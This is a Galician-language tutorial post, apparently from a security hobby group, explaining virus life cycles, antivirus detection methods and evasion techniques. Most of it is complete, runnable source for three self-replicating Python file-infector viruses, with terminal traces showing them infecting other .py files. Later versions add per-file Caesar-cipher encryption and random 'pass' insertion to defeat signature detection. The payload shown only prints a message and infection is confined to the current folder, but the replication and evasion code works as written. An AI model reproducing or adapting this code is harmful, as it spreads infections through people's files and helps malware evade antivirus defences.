Virus e Python


Nesta publicación explicarase varias cuestións a hora de entender como funciona un virus. Primeiro explicaranse que son e como é o seu ciclo de vida. A continuación, esbozaranse as principais técnicas para detectar un virus. Despois, comentaranse as principais técnicas anti-antivirus. Logo, explicarase como funciona un virus aportando exemplos de código, para finalmente, engadir varias melloras e proteccións para que non se poida detectar mediante sinatura.

Advertencia: a finalidade desta publicación é educativa. En ningún caso os membros de Hackliza se farán responsables do que se faga con este código.

Que é un virus?

Un virus é un programa capaz de copiarse a si mesmo a outros arquivos.

O ciclo de vida dun virus, normalmente, consta de tres fases:

 • Infección: nesta fase o virus espallase polo sistema, buscando posibles ficheiros para reproducirse e finalmente copiarse. Existen dous tipos de infección:
  • Pasiva: o usuario dun sistema copia o virus dalgún lado e execútao.
  • Activa: o virus explota algunha vulnerabilidade para infectar o sistema.
 • Incubación: nesta fase o virus busca manterse no sistema o maior tempo posible.
 • Enfermidade: nesta fase é cando se realizan as accións non desexadas polo usuario.

Como se detecta un virus?

Á hora de detectar un virus, utilízanse varias técnicas:

Técnicas estáticas. Estas técnicas examinan os arquivos infectados ou orixinais sen executar o código. Algúns exemplos destas técnicas son:

 • Busca de sinaturas víricas: consiste en crear unha firma dunha característica propia do virus e buscala. A característica pode ser unha cadea de caracteres, unha secuencia de instrucións ou unha marca usada polo mecanismo de detección do virus.
 • Análise espectral: consiste en buscar instrucións sospeitosas utilizadas por outro software malicioso. Por exemplo, unha instrución sospeitosa sería “a = a + 0”, a cal non modifica o comportamento do virus, pero pode ser utilizada para modificar a sinatura deste.
 • Análise heurístico: consiste en analizar o comportamento dun programa, para detectar posibles accións maliciosas.

Técnicas dinámicas. Estas técnicas executan o código sospeitoso e deciden se é un malware ou non en base ao comportamento observado. Algunhas destas técnicas son:

 • Seguimento de comportamentos: o antivirus residente en memoria, intentará detectar calquera actividade sospeitosa e parala. Para observar o comportamento dun programa en Linux, o antivirus fará un seguimento das chamadas realizadas as interrupcións 13H e 21H. Para Windows, farase un seguimento das chamadas realizadas á API do sistema operativo.
 • Emulación de código (Sandboxing): o programa sospeitoso é executado nun sistema emulado para ver o seu comportamento.

Comprobación da integridade dos arquivos. Nesta técnica comprobase se se modificou un arquivo comprobando o hash cada certo tempo.

Técnicas anti-antivirus

Este tipo de técnicas empréganse para evitar que un antivirus detecte un código malicioso. Algunhas delas son:

Técnicas de sixilo: son un conxunto de técnicas cuxo obxectivo é convencer ao usuario de que non está pasando nada malo. Algún exemplo destas técnicas son:

 • Hooking de interrupcións ou chamadas realizadas á API de Windows.
 • Borrar o seu propio executable.
 • Detección dunha sandbox para non executarse.

Polimorfismo: son técnicas encamiñadas a evitar a detección por sinatura. Este tipo de técnicas fan que se reescriba o código do programa (neste tipo de modificacións non se cambia o comportamento do virus, se non que se engaden instrucións lixo coma por exemplo, NOP ou add eax, 0) ou que se cifren partes deste.

Metamorfismo: son técnicas encamiñadas a evitar a detección por sinatura e a detección por comportamento. Este tipo de técnicas fan que se reescriba o código do programa cambiando as súas funcionalidades. Algunhas técnicas de metamorfismo son:

 • Dividir unha instrución en dúas ou máis.
 • Converter dúas instrucións nunha soa.
 • Adición de código morto.

Outras técnicas máis intrusivas son: matar o proceso do antivirus, desinstalar o antivirus ou corromper a base de datos de sinaturas do antivirus.

Creación e funcionamento dun virus

Para ensinar como funciona un virus utilizarase Python coma linguaxe de programación. Esta linguaxe foi escollida pola pouca complexidade que se ten á hora de crear e ler código.

Nota: ningún dos virus ensinados nesta publicación conterá unha función maliciosa con fin de evitar estragos. Tamén hai que destacar que en todas as funcións de infección presentadas só se contempla o directorio dende onde se executa o virus.

Creando un virus

O virus que se presenta a continuación terá a funcionalidades de autoreplicarse e mostrar pola pantalla unha mensaxe cando se termina o proceso de infección. Outra característica é que o virus escríbese no principio de cada arquivo infectado, facendo que, se se executa un arquivo que conteña o virus, se execute o código malicioso antes ca o código lexítimo.

Sen máis preámbulos disponse a explicar que fan cada unha das partes do virus:

 • Función infectar: esta función busca posibles arquivos para infectar no cartafol onde se executa o virus. Unha vez atopado un candidato, comproba se xa está infectado previamente. Se non o está, crearase un novo ficheiro que conterá o virus e o código do candidato.
def infectar(virus):
  ruta = "."
  for arquivo in os.listdir(ruta):
    if arquivo.endswith(".py"):
      script = open(arquivo, "r")
      texto_script = script.read()
      script.close()
      if not "# Virus:Inicio" in texto_script:
        infectado = open(arquivo + ".infectado", "w")
        infectado.write(virus + "\n")
        infectado.write(texto_script)
        infectado.close()
        os.remove(arquivo)
        os.rename(arquivo + ".infectado", arquivo)
 • Función payload: esta función contería o código malicioso. Neste caso só imprime pola pantalla a mensaxe “Fuches infectado”.
def payload():
  print("Fuches infectado")
 • Función executa: esta función chama as funcións de infectar e payload.
def executa(virus):
  infectar(virus)
  payload()
 • Código global: Este código lee o arquivo que se está a executar, extrae o código do virus e chama á función executa.
portador = open(sys.argv[0], "r")
texto_portador = portador.read()
portador.close()
virus = texto_portador[texto_portador.find("# Virus:Inicio"):texto_portador.rfind("# Virus:Fin") + len("# Virus:Fin")]
executa(virus)

O código do virus atópase situado entre dous comentarios: #Virus:Inicio e #Virus:Fin. Con estes comentarios pretendese coñecer a localización do código vírico en calquera arquivo (tanto os infectados coma o orixinal).

Unha vez explicadas polo miúdo as funcións do virus, o código final deste é o seguinte:

# Virus:Inicio
import os
import sys


def infectar(virus):
  ruta = "."
  for arquivo in os.listdir(ruta):
    if arquivo.endswith(".py"):
      script = open(arquivo, "r")
      texto_script = script.read()
      script.close()
      if not "# Virus:Inicio" in texto_script:
        infectado = open(arquivo + ".infectado", "w")
        infectado.write(virus + "\n")
        infectado.write(texto_script)
        infectado.close()
        os.remove(arquivo)
        os.rename(arquivo + ".infectado", arquivo)


def payload():
  print("Fuches infectado")


def executa(virus):
  infectar(virus)
  payload()


portador = open(sys.argv[0], "r")
texto_portador = portador.read()
portador.close()
virus = texto_portador[texto_portador.find("# Virus:Inicio"):texto_portador.rfind("# Virus:Fin") + len("# Virus:Fin")]
executa(virus)
# Virus:Fin

Se se executa este código nun cartafol con outros ficheiros coa extensión .py, obterase o seguinte resultado:

probasvx@probasvx:~/virus1$ ls -las
total 16
4 drwxr-xr-x 2 probasvx probasvx 4096 Dec 14 11:12 .
4 drwxr-xr-x 23 probasvx probasvx 4096 Dec 14 11:05 ..
4 -rw-r--r-- 1 probasvx probasvx  20 Dec 14 11:12 Ola.py
4 -rw-r--r-- 1 probasvx probasvx 925 Dec 14 11:11 virus.py
probasvx@probasvx:~/virus1$ cat Ola.py 
print("Ola mundo!")
probasvx@probasvx:~/virus1$ python3 virus.py 
Fuches infectado
probasvx@probasvx:~/virus1$ ls -las
total 16
4 drwxr-xr-x 2 probasvx probasvx 4096 Dec 14 11:12 .
4 drwxr-xr-x 23 probasvx probasvx 4096 Dec 14 11:05 ..
4 -rw-r--r-- 1 probasvx probasvx 945 Dec 14 11:12 Ola.py
4 -rw-r--r-- 1 probasvx probasvx 925 Dec 14 11:11 virus.py
probasvx@probasvx:~/virus1$ cat Ola.py 
# Virus:Inicio
import os
import sys


def infectar(virus):
  ruta = "."
  for arquivo in os.listdir(ruta):
    if arquivo.endswith(".py"):
      script = open(arquivo, "r")
      texto_script = script.read()
      script.close()
      if not "# Virus:Inicio" in texto_script:
        infectado = open(arquivo + ".infectado", "w")
        infectado.write(virus + "\n")
        infectado.write(texto_script)
        infectado.close()
        os.remove(arquivo)
        os.rename(arquivo + ".infectado", arquivo)


def payload():
  print("Fuches infectado")


def executa(virus):
  infectar(virus)
  payload()


portador = open(sys.argv[0], "r")
texto_portador = portador.read()
portador.close()
virus = texto_portador[texto_portador.find("# Virus:Inicio"):texto_portador.rfind("# Virus:Fin") + len("# Virus:Fin")]
executa(virus)
# Virus:Fin
print("Ola mundo!")

Nesta traza pódese ver como despois da execución do virus, o arquivo Ola.py aumentou de tamaño, xa que agora contén o código do virus.

A principal debilidade deste virus é que o código está contido entre os comentarios “#Virus:Inicio” e “#Virus:Fin”. Con este dato un antivirus é capaz de detectar e eliminar o código de forma trivial. Por outro lado, coma o código é sempre o mesmo, pódese utilizar como firma do virus para a detección.

Corrixindo debilidades

En vista das debilidades que ten o virus anterior, a continuación engadirase unha protección a cal será cifrar o código para que, por un lado o cifrado sexa diferente despois de cada infección (e polo tanto a firma do código tamén) e por outro para que aos analistas lles sexa máis complicado saber que fai o código. Outra cousa que cambia é que neste virus deixarase de utilizar os comentarios “#Virus:Inicio” e “#Virus:Fin” xa que son unha evidencia do propio virus. Por último, os arquivos infectados terán o código do virus ao final en vez de ao principio.

O malware que se presenta a continuación será un xerme, isto é un programa en texto claro que xerará un virus (neste caso cunha parte cifrada). Este xerme conterá unha función para cifrar e outra para descifrar o código, tamén contará cunha función para o cálculo da clave coa que se cifran os datos.

As diferentes partes do xerme que se creará son as seguintes:

 • Función calcula_clave: esta función calcula a clave de cifrado a partir das primeiras letras dun arquivo. En caso de que o arquivo conteña menos de 3 letras a clave devolta é 42.
def calcula_clave(texto):
  if len(texto) >= 3:
    clave = ord(texto[0]) + ord(texto[1]) + ord(texto[2])
  else:
    clave = 42
  return clave
 • Función descifra: esta función descifra un texto cifrado co cifrado Cesar.
def descifra(texto, clave):
  texto_descifrado = ""
  for caracter in texto:
    if caracter.isupper():
      texto_descifrado += chr((ord(caracter) - clave - 65) % 26 + 65)
    elif caracter.islower():
      texto_descifrado += chr((ord(caracter) - clave - 97) % 26 + 97)
    else:
      texto_descifrado += caracter
  return texto_descifrado
 • Función cifra: esta función cifra un texto co cifrado Cesar.
def cifra(texto, clave):
  texto_cifrado = ""
  for caracter in texto:
    if caracter.isupper():
      texto_cifrado += chr((ord(caracter) + clave - 65) % 26 + 65)
    elif caracter.islower():
      texto_cifrado += chr((ord(caracter) + clave - 97) % 26 + 97)
    else:
      texto_cifrado += caracter
  return texto_cifrado

Nota: as funcións de cifrado e descifrado, só modificarán as maiúsculas e minúsculas. O resto de caracteres déixanos igual.

 • Función infectar: esta función busca no cartafol dende onde se executa o virus arquivos que teñan a extensión .py para infectalos. Se existe algún arquivo que teña esta extensión, abrirase o arquivo e comprobarase se contén a cadea de caracteres “del calcula_clave”, se non a ten, faranse as seguintes accións:
  • Cifraranse as funcións “cifra”, “infectar”, “payload” e “executa”.
  • Engadiranse as funcións calcula_clave e descifra ao arquivo a infectar.
  • Crearase un código para descifrar o texto cifrado.
  • Engadiranse o código cifrado e o código para descifralo ao final do arquivo a infectar.
def infectar(virus):
  import os
  for arquivo in os.listdir("."):
    if arquivo.endswith(".py"):
      script = open(arquivo, "r+")
      texto_script = script.read()
      if "def calcula_clave" not in texto_script:
        parte_en_claro = virus[:541]
        parte_a_cifrar = virus[541:]
        clave = calcula_clave(texto_script)
        parte_crifrada = cifra(parte_a_cifrar, clave)
        script.write(parte_en_claro)
        descrifrador = "import sys" + chr(10) + "portador = open(sys.argv[0], " + chr(34) + "r" + chr(34) + ")" + chr(10) + "texto_portador = portador.read()" + chr(10) + "portador.close()" + chr(10) + "parte_sin_cifrar = texto_portador[texto_portador.find(" + chr(34) + "def calcula_clave" + chr(34) + "):texto_portador.find(" + chr(34) + "def calcula_clave" + chr(34) + ")+541]" + chr(10) + "clave = calcula_clave(texto_portador)" + chr(10) + "texto_descifrado = descifra(" + chr(34) + chr(34) + chr(34) + parte_crifrada + chr(34) + chr(34) + chr(34) + ", clave)" + chr(10) + "exec(texto_descifrado)" + chr(10) + "executa(parte_sin_cifrar + texto_descifrado)"
        script.write(descrifrador)
      script.close()
 • Código da variable descifrador: este é o código que se utiliza para descifrar o contido cifrado do virus despois da primeira infección.
import sys
portador = open(sys.argv[0], "r")
texto_portador = portador.read()
portador.close()
parte_sin_cifrar = texto_portador[texto_portador.find("def calcula_clave"):texto_portador.find("def calcula_clave")+541]
clave = calcula_clave(texto_portador)
texto_descifrado = descifra("""
wxy vbykt(mxqmh, vetox):
  mxqmh_vbyktwh = ""
  yhk vtktvmxk bg mxqmh:

***

wxy xqxvnmt(obknl):
  bgyxvmtk(obknl)
  itrehtw()

""", clave)
exec(texto_descifrado)
executa(parte_sin_cifrar + texto_descifrado)
 • Función payload: esta función contería o código malicioso. Neste caso só imprime pola pantalla a mensaxe “Fuches infectado”.
def payload():
  print("Fuches infectado")
 • Función executa: chama as funciona de infectar e payload.
def executa(virus):
  infectar(virus)
  payload()
 • Código global: Este código lee o código do xerme, quédase co resto coas funcións explicadas anteriormente e executa o virus.
import sys
portador = open(sys.argv[0], "r")
texto_portador = portador.read()
portador.close()
virus = texto_portador[:2244]
executa(virus)

Despois de explicar todas as funcións, o código completo do xerme é o seguinte:

def calcula_clave(texto):
  if len(texto) >= 3:
    clave = ord(texto[0]) + ord(texto[1]) + ord(texto[2])
  else:
    clave = 42
  return clave


def descifra(texto, clave):
  texto_descifrado = ""
  for caracter in texto:
    if caracter.isupper():
      texto_descifrado += chr((ord(caracter) - clave - 65) % 26 + 65)
    elif caracter.islower():
      texto_descifrado += chr((ord(caracter) - clave - 97) % 26 + 97)
    else:
      texto_descifrado += caracter
  return texto_descifrado


def cifra(texto, clave):
  texto_cifrado = ""
  for caracter in texto:
    if caracter.isupper():
      texto_cifrado += chr((ord(caracter) + clave - 65) % 26 + 65)
    elif caracter.islower():
      texto_cifrado += chr((ord(caracter) + clave - 97) % 26 + 97)
    else:
      texto_cifrado += caracter
  return texto_cifrado


def infectar(virus):
  import os
  for arquivo in os.listdir("."):
    if arquivo.endswith(".py"):
      script = open(arquivo, "r+")
      texto_script = script.read()
      if "def calcula_clave" not in texto_script:
        parte_en_claro = virus[:541]
        parte_a_cifrar = virus[541:]
        clave = calcula_clave(texto_script)
        parte_crifrada = cifra(parte_a_cifrar, clave)
        script.write(parte_en_claro)
        descrifrador = "import sys" + chr(10) + "portador = open(sys.argv[0], " + chr(34) + "r" + chr(34) + ")" + chr(10) + "texto_portador = portador.read()" + chr(10) + "portador.close()" + chr(10) + "parte_sin_cifrar = texto_portador[texto_portador.find(" + chr(34) + "def calcula_clave" + chr(34) + "):texto_portador.find(" + chr(34) + "def calcula_clave" + chr(34) + ")+541]" + chr(10) + "clave = calcula_clave(texto_portador)" + chr(10) + "texto_descifrado = descifra(" + chr(34) + chr(34) + chr(34) + parte_crifrada + chr(34) + chr(34) + chr(34) + ", clave)" + chr(10) + "exec(texto_descifrado)" + chr(10) + "executa(parte_sin_cifrar + texto_descifrado)"
        script.write(descrifrador)
      script.close()


def payload():
  print("Fuches infectado")


def executa(virus):
  infectar(virus)
  payload()


import sys
portador = open(sys.argv[0], "r")
texto_portador = portador.read()
portador.close()
virus = texto_portador[:2244]
executa(virus)

Se executamos este código nun cartafol con onde se atope algún outro ficheiro cuxa extensión é .py obterase a seguinte traza:

probasvx@probasvx:~/virus2$ ls -las
total 16
4 drwxr-xr-x 2 probasvx probasvx 4096 Dec 9 15:59 .
4 drwxr-xr-x 21 probasvx probasvx 4096 Dec 9 12:04 ..
4 -rw-r--r-- 1 probasvx probasvx  20 Dec 9 15:59 Ola.py
4 -rw-r--r-- 1 probasvx probasvx 2385 Dec 9 15:59 virus.py
probasvx@probasvx:~/virus2$ cat Ola.py 
print("Ola mundo!")
probasvx@probasvx:~/virus2$ python3 virus.py 
Fuches infectado
probasvx@probasvx:~/virus2$ ls -las
total 16
4 drwxr-xr-x 2 probasvx probasvx 4096 Dec 9 15:59 .
4 drwxr-xr-x 21 probasvx probasvx 4096 Dec 9 12:04 ..
4 -rw-r--r-- 1 probasvx probasvx 2628 Dec 9 16:00 Ola.py
4 -rw-r--r-- 1 probasvx probasvx 2385 Dec 9 15:59 virus.py

Nesta traza pódese ver que o ficheiro Ola.py aumentou de tamaño. O contido que contén despois da execución do virus é o seguinte:

print("Ola mundo!")
def calcula_clave(texto):
  if len(texto) >= 3:
    clave = ord(texto[0]) + ord(texto[1]) + ord(texto[2])
  else:
    clave = 42
  return clave


def descifra(texto, clave):
  texto_descifrado = ""
  for caracter in texto:
    if caracter.isupper():
      texto_descifrado += chr((ord(caracter) - clave - 65) % 26 + 65)
    elif caracter.islower():
      texto_descifrado += chr((ord(caracter) - clave - 97) % 26 + 97)
    else:
      texto_descifrado += caracter
  return texto_descifrado

import sys
portador = open(sys.argv[0], "r")
texto_portador = portador.read()
portador.close()
parte_sin_cifrar = texto_portador[texto_portador.find("def calcula_clave"):texto_portador.find("def calcula_clave")+541]
clave = calcula_clave(texto_portador)
texto_descifrado = descifra("""
wxy vbykt(mxqmh, vetox):
  mxqmh_vbyktwh = ""
  yhk vtktvmxk bg mxqmh:
    by vtktvmxk.blniixk():
      mxqmh_vbyktwh += vak((hkw(vtktvmxk) + vetox - 65) % 26 + 65)
    xeby vtktvmxk.blehpxk():
      mxqmh_vbyktwh += vak((hkw(vtktvmxk) + vetox - 97) % 26 + 97)
    xelx:
      mxqmh_vbyktwh += vtktvmxk
  kxmnkg mxqmh_vbyktwh


wxy bgyxvmtk(obknl):
  bfihkm hl
  yhk tkjnboh bg hl.eblmwbk("."):
    by tkjnboh.xgwlpbma(".ir"):
      lvkbim = hixg(tkjnboh, "k+")
      mxqmh_lvkbim = lvkbim.kxtw()
      by "wxy vtevnet_vetox" ghm bg mxqmh_lvkbim:
        itkmx_xg_vetkh = obknl[:541]
        itkmx_t_vbyktk = obknl[541:]
        vetox = vtevnet_vetox(mxqmh_lvkbim)
        itkmx_vkbyktwt = vbykt(itkmx_t_vbyktk, vetox)
        lvkbim.pkbmx(itkmx_xg_vetkh)
        wxlvkbyktwhk = "bfihkm lrl" + vak(10) + "ihkmtwhk = hixg(lrl.tkzo[0], " + vak(34) + "k" + vak(34) + ")" + vak(10) + "mxqmh_ihkmtwhk = ihkmtwhk.kxtw()" + vak(10) + "ihkmtwhk.vehlx()" + vak(10) + "itkmx_lbg_vbyktk = mxqmh_ihkmtwhk[mxqmh_ihkmtwhk.ybgw(" + vak(34) + "wxy vtevnet_vetox" + vak(34) + "):mxqmh_ihkmtwhk.ybgw(" + vak(34) + "wxy vtevnet_vetox" + vak(34) + ")+541]" + vak(10) + "vetox = vtevnet_vetox(mxqmh_ihkmtwhk)" + vak(10) + "mxqmh_wxlvbyktwh = wxlvbykt(" + vak(34) + vak(34) + vak(34) + itkmx_vkbyktwt + vak(34) + vak(34) + vak(34) + ", vetox)" + vak(10) + "xqxv(mxqmh_wxlvbyktwh)" + vak(10) + "xqxvnmt(itkmx_lbg_vbyktk + mxqmh_wxlvbyktwh)"
        lvkbim.pkbmx(wxlvkbyktwhk)
      lvkbim.vehlx()


wxy itrehtw():
  ikbgm("Ynvaxl bgyxvmtwh")


wxy xqxvnmt(obknl):
  bgyxvmtk(obknl)
  itrehtw()

""", clave)
exec(texto_descifrado)
executa(parte_sin_cifrar + texto_descifrado)

No ficheiro infectado pódense ver as seguintes partes:

 • O código do anterior programa (o “Ola mundo!").
 • As funcións para o cálculo da clave e descifrado.
 • O código cifrado xunto coas chamadas as funcións de cálculo da clave e descifrado.
 • Chamada a función exec para que Python interprete o código descifrado.

Despois de todos os cambios realizados ao virus inicial segue habendo unha debilidade, este virus pódese detectar polas funcións de descifrado e cálculo de clave, xa que estas pódense utilizar como sinatura para a detección do virus.

Hai que destacar que este virus infecta aos arquivos que non conteñan a cadea de caracteres “def calcula_clave”, polo que se nun programa ou script lexítimo existe esa cadea de caracteres, non será infectado.

Evitando a detección por firma

Nesta nova versión, engadirase a funcionalidade de modificar o código das funcións que non se cifran (calcula_clave e descifa) engadindo a palabra reservada “pass” varias veces de forma aleatoria neste código. Hai que dicir que a palabra reservada “pass” non ten ningún efecto na funcionalidade das funcións. Cada vez que se execute o virus, os novos arquivos infectados poderán ter os “pass” en diferentes posicións. Con esta modificación pretendese que non se utilice o código que non se cifra como sinatura do virus.

Para conseguir a funcionalidade descrita engadíronse e modificáronse as seguintes funcións:

 • Función borra_pass: esta función borra todas as aparicións da palabra reservada “pass” no código que non se cifra.
def borra_pass(codigo):
  codigo_sen_pass = []
  for linha in codigo.split(chr(10)):
    if not "pass" in linha:
      codigo_sen_pass.append(linha)
  return chr(10).join(codigo_sen_pass)
 • Función calcula_tabulacion: esta función calcula o número de espazos que preceden a un “pass” cando se insire.
def calcula_tabulacion(codigo, posicion):
  if "else" in codigo[posicion] or "elif" in codigo[posicion]:
    return len(codigo[posicion]) - len(codigo[posicion].lstrip()) + 4
  return len(codigo[posicion]) - len(codigo[posicion].lstrip())
 • Función engade_pass: esta función é a que coloca aleatoriamente os “pass” no código que non se cifra.
def engade_pass(codigo):
  import random
  linhas = codigo.split(chr(10))
  for i in range(10):
    if random.random() > 0.75:
      posicion_insecion = random.randint(1, len(linhas) - 1)
      linhas.insert(posicion_insecion, " " * calcula_tabulacion(linhas, posicion_insecion) + "pass")
  return chr(10).join(linhas)
 • Función modifica: esta función é a encargada de borrar os “pass” previos e engadir os novos a cada unha das funcións que non se cifran.
def modifica(codigo):
  novo_codigo = []
  separador = chr(10) + chr(10) + chr(10)
  funcions = codigo.split(separador)
  for texto in funcions:
    if texto:
      codigo_sen_pass = borra_pass(texto)
      codigo_con_pass = engade_pass(codigo_sen_pass)
      novo_codigo.append(codigo_con_pass)
    else:
      novo_codigo.append(texto)
  return separador.join(novo_codigo)

Función infectar: esta función fai o mesmo ca antes, pero agora:

 • En vez de obter a parte e claro e a parte a cifrar mediante un valor fixo, obtense buscando a posición da función cifra.
 • Chamase a función modifica para que o código que non se cifre sexa diferente.
 • O código do descifrador xa non ten o valor fixo para indicar a lonxitude da parte descifrada; agora calculase en función do tamaño do código modificado.
def infectar(virus):
  import os
  for arquivo in os.listdir("."):
    if arquivo.endswith(".py"):
      script = open(arquivo, "r+")
      texto_script = script.read()
      if "def calcula_clave" not in texto_script:
        parte_en_claro = virus[:virus.find("def cifra")]
        parte_a_cifrar = virus[virus.find("def cifra"):]
        parte_en_claro_modificada = modifica(parte_en_claro)
        clave = calcula_clave(texto_script)
        parte_crifrada = cifra(parte_a_cifrar, clave)
        script.write(parte_en_claro_modificada)
        descrifrador = "import sys" + chr(10) + "portador = open(sys.argv[0], " + chr(34) + "r" + chr(34) + ")" + chr(10) + "texto_portador = portador.read()" + chr(10) + "portador.close()" + chr(10) + "parte_sin_cifrar = texto_portador[texto_portador.find(" + chr(34) + "def calcula_clave" + chr(34) + "):texto_portador.find(" + chr(34) + "def calcula_clave" + chr(34) + ")+" + str(len(parte_en_claro_modificada)) + "]" + chr(10) + "clave = calcula_clave(texto_portador)" + chr(10) + "texto_descifrado = descifra(" + chr(34) + chr(34) + chr(34) + parte_crifrada + chr(34) + chr(34) + chr(34) + ", clave)" + chr(10) + "exec(texto_descifrado)" + chr(10) + "executa(parte_sin_cifrar + texto_descifrado)"
        script.write(descrifrador)
      script.close()

O resto de funcións do xerme (calcula_clave, descifra, cifra, payload e executa) e código global non se modificaron. Dito isto, o código completo deste xerme é o seguinte:

def calcula_clave(texto):
  if len(texto) >= 3:
    clave = ord(texto[0]) + ord(texto[1]) + ord(texto[2])
  else:
    clave = 42
  return clave


def descifra(texto, clave):
  texto_descifrado = ""
  for caracter in texto:
    if caracter.isupper():
      texto_descifrado += chr((ord(caracter) - clave - 65) % 26 + 65)
    elif caracter.islower():
      texto_descifrado += chr((ord(caracter) - clave - 97) % 26 + 97)
    else:
      texto_descifrado += caracter
  return texto_descifrado


def cifra(texto, clave):
  texto_cifrado = ""
  for caracter in texto:
    if caracter.isupper():
      texto_cifrado += chr((ord(caracter) + clave - 65) % 26 + 65)
    elif caracter.islower():
      texto_cifrado += chr((ord(caracter) + clave - 97) % 26 + 97)
    else:
      texto_cifrado += caracter
  return texto_cifrado


def borra_pass(codigo):
  codigo_sen_pass = []
  for linha in codigo.split(chr(10)):
    if not "pass" in linha:
      codigo_sen_pass.append(linha)
  return chr(10).join(codigo_sen_pass)


def calcula_tabulacion(codigo, posicion):
  if "else" in codigo[posicion] or "elif" in codigo[posicion]:
    return len(codigo[posicion]) - len(codigo[posicion].lstrip()) + 4
  return len(codigo[posicion]) - len(codigo[posicion].lstrip())


def engade_pass(codigo):
  import random
  linhas = codigo.split(chr(10))
  for i in range(10):
    if random.random() > 0.75:
      posicion_insecion = random.randint(1, len(linhas) - 1)
      linhas.insert(posicion_insecion, " " * calcula_tabulacion(linhas, posicion_insecion) + "pass")
  return chr(10).join(linhas)


def modifica(codigo):
  novo_codigo = []
  separador = chr(10) + chr(10) + chr(10)
  funcions = codigo.split(separador)
  for texto in funcions:
    if texto:
      codigo_sen_pass = borra_pass(texto)
      codigo_con_pass = engade_pass(codigo_sen_pass)
      novo_codigo.append(codigo_con_pass)
    else:
      novo_codigo.append(texto)
  return separador.join(novo_codigo)


def infectar(virus):
  import os
  for arquivo in os.listdir("."):
    if arquivo.endswith(".py"):
      script = open(arquivo, "r+")
      texto_script = script.read()
      if "def calcula_clave" not in texto_script:
        parte_en_claro = virus[:virus.find("def cifra")]
        parte_a_cifrar = virus[virus.find("def cifra"):]
        parte_en_claro_modificada = modifica(parte_en_claro)
        clave = calcula_clave(texto_script)
        parte_crifrada = cifra(parte_a_cifrar, clave)
        script.write(parte_en_claro_modificada)
        descrifrador = "import sys" + chr(10) + "portador = open(sys.argv[0], " + chr(34) + "r" + chr(34) + ")" + chr(10) + "texto_portador = portador.read()" + chr(10) + "portador.close()" + chr(10) + "parte_sin_cifrar = texto_portador[texto_portador.find(" + chr(34) + "def calcula_clave" + chr(34) + "):texto_portador.find(" + chr(34) + "def calcula_clave" + chr(34) + ")+" + str(len(parte_en_claro_modificada)) + "]" + chr(10) + "clave = calcula_clave(texto_portador)" + chr(10) + "texto_descifrado = descifra(" + chr(34) + chr(34) + chr(34) + parte_crifrada + chr(34) + chr(34) + chr(34) + ", clave)" + chr(10) + "exec(texto_descifrado)" + chr(10) + "executa(parte_sin_cifrar + texto_descifrado)"
        script.write(descrifrador)
      script.close()


def payload():
  print("Fuches infectado")


def executa(virus):
  infectar(virus)
  payload()


import sys
portador = open(sys.argv[0], "r")
texto_portador = portador.read()
portador.close()
virus = texto_portador[:3621]
executa(virus)

Se o executamos o xerme nun cartafol con varios arquivos con extensión .py obteremos a seguinte traza:

probasvx@probasvx:~/virus3$ ls -las
total 20
4 drwxr-xr-x 2 probasvx probasvx 4096 Dec 13 18:26 .
4 drwxr-xr-x 23 probasvx probasvx 4096 Dec 13 17:58 ..
4 -rw-r--r-- 1 probasvx probasvx  39 Dec 13 18:26 Ola2.py
4 -rw-r--r-- 1 probasvx probasvx  20 Dec 13 17:57 Ola.py
4 -rw-r--r-- 1 probasvx probasvx 3764 Dec 13 18:16 virus.py
probasvx@probasvx:~/virus3$ cat Ola.py 
print("Ola mundo!")
probasvx@probasvx:~/virus3$ cat Ola2.py 
# Comentario
print("Ola outra vez :)")
probasvx@probasvx:~/virus3$ python3 virus.py 
Fuches infectado
probasvx@probasvx:~/virus3$ ls -las
total 28
4 drwxr-xr-x 2 probasvx probasvx 4096 Dec 13 18:26 .
4 drwxr-xr-x 23 probasvx probasvx 4096 Dec 13 17:58 ..
8 -rw-r--r-- 1 probasvx probasvx 4123 Dec 13 18:27 Ola2.py
8 -rw-r--r-- 1 probasvx probasvx 4113 Dec 13 18:27 Ola.py
4 -rw-r--r-- 1 probasvx probasvx 3764 Dec 13 18:16 virus.py

Na traza pódese observar que o tamaño do ficheiro Ola2.py, antes da execución do virus, tiña 19 bytes máis ca Ola.py. Despois da execución do virus, Ola2.py pasou a ter só 10 bytes máis. Isto débese á cantidade e posición de “pass” inseridos no código que non se cifra do virus. A continuación móstranse os códigos de cada ficheiro:

probasvx@probasvx:~/virus3$ cat Ola.py 
print("Ola mundo!")
def calcula_clave(texto):
  pass
  if len(texto) >= 3:
    clave = ord(texto[0]) + ord(texto[1]) + ord(texto[2])
    pass
    pass
    pass
  else:
    clave = 42
  return clave


def descifra(texto, clave):
  texto_descifrado = ""
  for caracter in texto:
    if caracter.isupper():
      texto_descifrado += chr((ord(caracter) - clave - 65) % 26 + 65)
    elif caracter.islower():
      pass
      pass
      pass
      texto_descifrado += chr((ord(caracter) - clave - 97) % 26 + 97)
    else:
      texto_descifrado += caracter
  pass
  return texto_descifrado
probasvx@probasvx:~/virus3$ cat Ola2.py 
# Comentario
print("Ola outra vez :)")
def calcula_clave(texto):
  pass
  pass
  if len(texto) >= 3:
    pass
    clave = ord(texto[0]) + ord(texto[1]) + ord(texto[2])
  else:
    clave = 42
  return clave


def descifra(texto, clave):
  texto_descifrado = ""
  for caracter in texto:
    if caracter.isupper():
      pass
      pass
      pass
      texto_descifrado += chr((ord(caracter) - clave - 65) % 26 + 65)
    elif caracter.islower():
      texto_descifrado += chr((ord(caracter) - clave - 97) % 26 + 97)
    else:
      pass
      texto_descifrado += caracter
  return texto_descifrado

O código completo dun arquivo infectado é o seguinte:

print("Ola mundo!")
def calcula_clave(texto):
  pass
  if len(texto) >= 3:
    clave = ord(texto[0]) + ord(texto[1]) + ord(texto[2])
    pass
    pass
    pass
  else:
    clave = 42
  return clave


def descifra(texto, clave):
  texto_descifrado = ""
  for caracter in texto:
    if caracter.isupper():
      texto_descifrado += chr((ord(caracter) - clave - 65) % 26 + 65)
    elif caracter.islower():
      pass
      pass
      pass
      texto_descifrado += chr((ord(caracter) - clave - 97) % 26 + 97)
    else:
      texto_descifrado += caracter
  pass
  return texto_descifrado


import sys
portador = open(sys.argv[0], "r")
texto_portador = portador.read()
portador.close()
parte_sin_cifrar = texto_portador[texto_portador.find("def calcula_clave"):texto_portador.find("def calcula_clave")+650]
clave = calcula_clave(texto_portador)
texto_descifrado = descifra("""wxy vbykt(mxqmh, vetox):
  mxqmh_vbyktwh = ""
  yhk vtktvmxk bg mxqmh:
    by vtktvmxk.blniixk():
